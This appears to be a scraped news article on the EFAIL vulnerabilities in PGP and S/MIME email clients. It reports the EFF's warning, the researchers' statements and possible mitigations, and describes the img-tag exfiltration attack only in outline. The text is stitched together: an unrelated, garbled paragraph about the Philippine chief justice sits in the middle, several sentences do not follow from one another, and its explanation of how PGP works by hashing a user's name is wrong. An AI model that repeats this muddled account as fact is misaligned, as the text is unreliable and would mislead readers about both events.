Security researchers discover critical flaw in PGP encryption that reveals plaintext

PSA PGP and S  MIME are broken and leaking encrypted emails – stop using them right now

Uninstall PGP: EFF warns of exploit that may reveal plaintext of encrypted emails

German researchers have found a major vulnerability in PGP (Pretty Good Privacy), a popular email encryption program, which could reveal past and present encrypted emails. The vulnerabilities, dubbed EFAIL, were first mentioned by the EFF on Sunday. The Foundation which has been in communication with the researchers has advised users to "temporarily stop sending and especially reading PGP-encrypted email".

Sebastian Schinzel, one of the researchers, promised in a Tweet to provide more details of the vulnerabilities on May 15.

The researchers meant to hold off on full publication until Tuesday, May 15, though the white paper was published earlier due to the embargo being broken.

"They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past", researchers said.

Essentially, an attacker sends three parts - a partial HTML img tag declaration, a string of encrypted text, followed by the closing HTML for the image tag.

There are two different types of attacks included in EFAIL. The attacker would then have to get the sender or one of the receivers of the previously obtained message to open a new attacker-sent email.

Philippines chief justice, Duterte's critic, expelled by Supreme Court colleagues
The chief justice said that he was reconstituting the bench and then stood up, he said, after which the bench was reconstituted. With "a lapdog Congress and a seriously wounded Senate, we now have a puppet Supreme Court", noted the statement .

Werner Koch of GnuPG, a popular provider of GPG encryption, said the vulnerability was not in the encryption protocols, but rather, in the email clients used to decrypt them. "The attack has a large surface, since for each encrypted email sent to n recipients, there are n + 1 mail clients that are susceptible to our attack", the abstract of the research paper reads.

EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.

The Efail report lists additional steps users can take to reduce the likelihood of falling prey to encryption attacks - namely, decrypting S/Mime and PGP outside email clients in a separate application and disabling HTML rendering altogether.

PGP, for example, works using an algorithm to generate a "hash", or mathematical summary, of a user's name and other information.

In the longer term they said patches for email client plugins and changes to OpenPGP and S/MIME could prevent any problems. The developer of NeoPG noted on Twitter that "The OpenPGP working group at the IETF, which was on the way to address some of the issues, was closed in November due to lack of progress".

Latest News